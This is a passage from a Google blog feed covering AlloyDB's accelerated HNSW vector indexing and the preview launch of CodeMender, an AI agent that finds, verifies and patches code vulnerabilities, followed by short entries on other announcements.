&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AlloyDB's &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;columnar engine &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;is a built-in, in-memory cache that stores data in a specialized, scan-optimized format.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With this release, AlloyDB can use &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;columnar engine accelerated HNSW &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;to:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Pin the index: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;pgvector&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; HNSW index is pinned (kept persistently in-memory to ensure fast access) directly into the columnar engine’s memory.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Vectorized access: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;It utilizes a memory layout specifically designed for the high-concurrency, pointer-heavy traversals required by HNSW graphs.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Bypass buffer overhead: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;By navigating the graph in a specialized memory space, AlloyDB avoids the standard buffer manager bottlenecks. This architectural shift is what enables the dramatic QPS and recall improvements shown above, even when comparing against a fully-cached standard index.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Why it Matters&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For enterprise-scale applications, this isn't just about a faster database—it's about cost and quality:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Reduced infrastructure costs:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Achieve the same performance with significantly lower compute resources.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Better AI accuracy:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Reach higher recall and quality at speeds that were previously only possible for "draft" (high-speed, lower-accuracy results) quality search.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;No application changes required:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Because this is built into AlloyDB, you get these gains using the same standard &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;pgvector&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; SQL syntax.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Note that the columnar engine does utilize memory, but it is highly compressed and meticulously managed. Because the engine stores vector data in an efficient columnar format, the memory footprint is minimal compared to the massive performance gains—making it a highly favorable trade-off for enterprise workloads.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Quick Start Guide&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To try out &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/accelerate-with-ce"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;columnar engine accelerated HNSW&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in AlloyDB, follow these steps:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1. &lt;/span&gt;&lt;strong&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/accelerate-with-ce"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Enable the columnar engine&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and index caching&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ensure that both &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;google_columnar_engine.enabled&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;google_columnar_engine.enable_index_caching&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; flags are set to &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;on&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for your AlloyDB instance.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2. &lt;strong&gt;Add the HNSW Index to columnar engine&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once your HNSW index is created via &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;pgvector&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, execute the following SQL command to cache it in the columnar engine:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;SELECT google_columnar_engine_add_index(&amp;#x27;&amp;lt;hnsw_index_name&amp;gt;&amp;#x27;);&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fd949d92dc0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;3. &lt;strong&gt;Additional Resources&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;New to AlloyDB? Discover AlloyDB with a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/free-trial-cluster"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;30-day free trial&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://colab.research.google.com/github/GoogleCloudPlatform/python-docs-samples/blob/main/alloydb/notebooks/columnar_engine_accelerated_hnsw_vector_search_benchmark.ipynb" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Colab Notebook&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: An end-to-end Python script to ingest the GloVe dataset, create indexes, and plot Recall vs QPS curves.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Is HNSW the right vector index choice for your use case? Check our ‘&lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/choose-index-strategy"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Choose a vector index in AlloyDB AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;’ guide.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/databases/supercharge-pgvector-4x-faster-hnsw-with-alloydb" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-21T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/find-and-fix-software-vulnerabilities-with-codemender</id>
    <title>Now in preview: Find and fix software vulnerabilities with CodeMender</title>
    <updated>2026-07-21T15:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As adversarial AI threats accelerate attacks on code, security teams must counter them with machine-speed defenses that can automate code remediation and fight AI with AI.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;CodeMender is our managed code security agent, and starting today, we're bringing its code scanning and remediation capabilities directly to you in preview.&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;CodeMender offers access to our generally available models via &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/codemender"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, or it can be deployed as a core component of &lt;/span&gt;&lt;a href="https://cloud.google.com/security/ai-threat-defense"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AI Threat Defense&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;CodeMender also aligns with our &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-next-26-why-we-re-multicloud-and-multi-ai"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;multi-model approach&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, so you can choose the right model to optimize for cost, speed, and deep scanning performance. It will support third-party frontier model options later this year.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=4DJD3RHOnPA"&gt;

      
        

        &lt;div class="article-video__aspect-image"&gt;
          &lt;span class="h-u-visually-hidden"&gt;How to find and fix code vulnerabilities autonomously with Google CodeMender.&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
      &lt;figcaption class="article-video__caption h-c-page"&gt;
        
          &lt;h4 class="h-c-headline h-c-headline--four h-u-font-weight-medium h-u-mt-std"&gt;Watch this overview of CodeMender in Gemini Enterprise Agent Platform.&lt;/h4&gt;
        
        
      &lt;/figcaption&gt;
    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=4DJD3RHOnPA"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;CodeMender can help you advance from passive scanning to automated code remediation, and reduce zero-day risk. It examines and remediates existing code security issues without sacrificing development velocity by:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Deploying the best-fit model&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. You can choose from multiple models to optimize for costs, speed, deep scanning, and coding performance.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Automating machine-scale remediation&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. You can now eliminate remediation bottlenecks caused by manual verification and patching, while keeping developers in the loop.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Prioritizing fixes by exploitability&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. You can run proof-of-concept exploits and execute simulations to verify that vulnerabilities in the code are exploitable, and prioritize resources on fixing the most critical issues first.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Find and fix vulnerabilities with AI&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Born from &lt;/span&gt;&lt;a href="https://deepmind.google/blog/introducing-gemini-3-5-flash-cyber" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google DeepMind's pioneering AI research&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, CodeMender transforms vulnerability management from a manual bottleneck into an autonomous, high-speed system. Your developers and security practitioners can automatically scan software for flaws, verify them with executable exploits, and remediate them with tested code fixes. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“At Salesforce, trust is our number one value, and protecting customer data means continually raising the bar for how we find, validate, and mitigate risks. CodeMender brings AI into a critical part of the security lifecycle by accelerating the path from validated vulnerability to tested fix. As AI reshapes the threat landscape, capabilities like this help strengthen resilience and give our customers the confidence to keep innovating,” said Iain &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Mulholland, CISO, Salesforce&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"CodeMender consistently identified critical vulnerabilities that our other AI-enabled tools completely missed. It doesn't just find theoretical flaws — it proves the immediate risk and delivers targeted, validated fixes that secure our environment without disrupting core business logic," said Scott Ponte, head, Security Operations, Robinhood. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"CodeMender is fast, comprehensive, and genuinely ambitious about closing the loop from detection to fix, enabling teams to secure their software supply chain without losing velocity," said Ashwin Kannan, principal AI engineer, Office of the CTO, Palo Alto Networks.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;How the CodeMender agent works&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We’ve fine-tuned CodeMender’s harness to be continuously updated with the latest Google DeepMind research, including the up-to-date agent skills, security tools, and system prompts. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Operating in the secure-by-design Agent Platform, CodeMender is protected by enterprise-grade, built-in governance and security guardrails, including secure traffic routing through your VPC, data isolation and encryption, and zero retention of source code data.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As an agent, it can integrate with existing continuous integration and continuous delivery (CI/CD) workflows, or run directly in local developer environments using a lightweight command-line interface (CLI) client. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can also configure CodeMender to scan and analyze code in a sandbox that you manage. The agent connects to your code repositories and works with developer tools, such as &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/code/docs/vscode/install"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;VS Code&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://antigravity.google/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Antigravity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, to safely analyze first-party, open-source, and third-party software.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Scan: Find hidden vulnerabilities with flexible model scanning &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;CodeMender scans for top vulnerability classes and understands the &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-how-ai-leverages-deep-context-defenders-advantage"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;unique context, goals, and functionality&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; of your software repositories and applications.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_LNSezkk.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Scan: Discovered new vulnerabilities and categorized by severity and type.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;CodeMender’s harness with security context helps you discover sophisticated vulnerabilities that static and model-only scanning miss. These scans look for hard-to-find vulnerabilities like memory corruption, injection, web security issues, cryptographic flaws, and insecure data handling. CodeMender supports common software languages including C/C++, Go, Java, Python, Ruby, Rust, and TypeScript.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Verify: Simulate and verify exploits to reduce noise&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;CodeMender can help cut alert fatigue and false positives by proving a vulnerability presents a legitimate risk before fixing it. The agent goes beyond static code-pattern analysis by simulating an attack with exploit code it builds and runs in an isolated, customer-managed sandbox.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="3" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/3_OEvpSjA.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Verify: Creates verification plan and builds and tests exploits in your sandbox environment.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The agent uses this proof-of-concept exploit to verify that the security flaw poses a legitimate risk. This critical verification phase allows your security practitioners and developers to prioritize validated risks by eliminating false positives.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Remediate: Automatically generate and test code fixes&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Identifying risky security flaws is only half the battle. Once a vulnerability is verified, CodeMender automatically generates a secure patch to resolve the issue. The fix is delivered as a code difference directly in developer tools, so it can be integrated into existing development workflows.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="4" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/4_LlL5FCA.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Remediate: Generates and tests code fix with code diff for developer review and approval.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;CodeMender further strengthens the fix by using LLM-as-a-judge to ensure it doesn’t disrupt existing application functionality. You can even provide context on your codebase's distinct coding conventions and styles so that CodeMender generates code that matches it. Developers remain in full control, manually reviewing and approving CodeMender's patches before any code is committed to the repository.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;CodeMender in AI Threat Defense&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When leveraged as part of &lt;/span&gt;&lt;a href="https://cloud.google.com/security/ai-threat-defense"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AI Threat Defense&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, Wiz orchestrates agentic application security, analyzing applications to prioritize investigations. It calls CodeMender to scan code (coming soon), enrich findings within the &lt;/span&gt;&lt;a href="https://www.wiz.io/lp/wiz-security-graph" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Wiz Security Graph&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; with deployment context, and trigger &lt;/span&gt;&lt;a href="https://www.wiz.io/solutions/red-agent" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Wiz Red Agent&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for AI pentesting to prove exploitability, ensuring that teams focus on the highest-risk vulnerabilities.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="AITD Wheel - Copy of Final - BLOG-ALT_AIThreatChart_2436x1200_v2" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/AITD_Wheel_-_Copy_of_Final_-_BLOG-ALT_AIThreatChart_2436x1200_v2.gif" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Through Wiz, AI Threat Defense calls CodeMender to scan code, enrich findings, and trigger AI pentesting.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Wiz serves as a command center for governing and scaling remediation in AI Threat Defense. The &lt;/span&gt;&lt;a href="https://www.wiz.io/blog/introducing-wiz-green-agent" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Wiz Green Agent&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; orchestrates this lifecycle by directing CodeMender to generate and test high-fidelity patches enriched with application context from the Security Graph. This &lt;/span&gt;&lt;a href="https://www.wiz.io/blog/introducing-wiz-workflows" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;workflow&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; empowers teams to resolve complex vulnerabilities with unprecedented speed and precision.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;How to get started with CodeMender&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Consistent with our &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-next-26-why-we-re-multicloud-and-multi-ai"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;multi-model approach&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, CodeMender can help you optimize for cost, speed, and deep scanning performance.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can use CodeMender with our generally available Gemini models via &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/codemender"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, or deploy it as a core component of &lt;/span&gt;&lt;a href="https://cloud.google.com/security/ai-threat-defense"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AI Threat Defense&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Separately, CodeMender with &lt;/span&gt;&lt;a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-6-flash-3-5-flash-lite-3-5-flash-c%20yber/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini 3.5 Flash Cyber&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; will be exclusively available to a small set of governments and trusted partners. We plan to expand this access over time.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;CodeMender is a critical step towards a continuous, self-healing agentic software development lifecycle, a future where code is autonomously secured, validated, and patched before it ever hits production. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can learn more about CodeMender and review the documentation &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/codemender"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/find-and-fix-software-vulnerabilities-with-codemender" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-21T15:00:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-cloudblog-publish/images/CodeMender_preview_hero.max-600x600.jpg" type="image/jpeg" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-cloudblog-publish/images/CodeMender_preview_hero.max-600x600.jpg"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-cloudblog-publish/images/CodeMender_preview_hero.max-600x600.jpg" type="image/jpeg" length="0"/>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-6-flash-3-5-flash-lite-3-5-flash-cyber</id>
    <title>Introducing Gemini 3.6 Flash, 3.5 Flash-Lite, and 3.5 Flash Cyber</title>
    <updated>2026-07-21T15:00:00+00:00</updated>
    <content type="html">a hero image saying 3.6 Flash, 3.5 Flash-Lite, and 3.5 Flash Cyber</content>
    <link href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-6-flash-3-5-flash-lite-3-5-flash-cyber" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-21T15:00:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/gemini-3-5_3-6_3-5-Cyber__key-a.max-600x600.format-webp_dgy5uuM.webp" type="image/webp" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/gemini-3-5_3-6_3-5-Cyber__key-a.max-600x600.format-webp_dgy5uuM.webp"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/gemini-3-5_3-6_3-5-Cyber__key-a.max-600x600.format-webp_dgy5uuM.webp" type="image/webp" length="0"/>
  </entry>
  <entry>
    <id>https://blog.google/company-news/outreach-and-initiatives/creating-opportunity/alliance-america-skilled-trades</id>
    <title>We’re announcing the Alliance for America’s Skilled Trades.</title>
    <updated>2026-07-21T14:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Skilled_Trades_Alliance_social.max-600x600.format-webp.webp" /&gt;Google is joining BlackRock, Carhartt and Ford to launch the Alliance for America’s Skilled Trades.</content>
    <link href="https://blog.google/company-news/outreach-and-initiatives/creating-opportunity/alliance-america-skilled-trades" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-21T14:00:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Skilled_Trades_Alliance_social.max-600x600.format-webp.webp" type="image/webp" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Skilled_Trades_Alliance_social.max-600x600.format-webp.webp"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Skilled_Trades_Alliance_social.max-600x600.format-webp.webp" type="image/webp" length="0"/>
  </entry>
  <entry>
    <id>https://android-developers.googleblog.com/2026/07/android-on-device-inference.html</id>
    <title>Build intelligent Android apps: On-device inference</title>
    <updated>2026-07-21T13:00:00+00:00</updated>
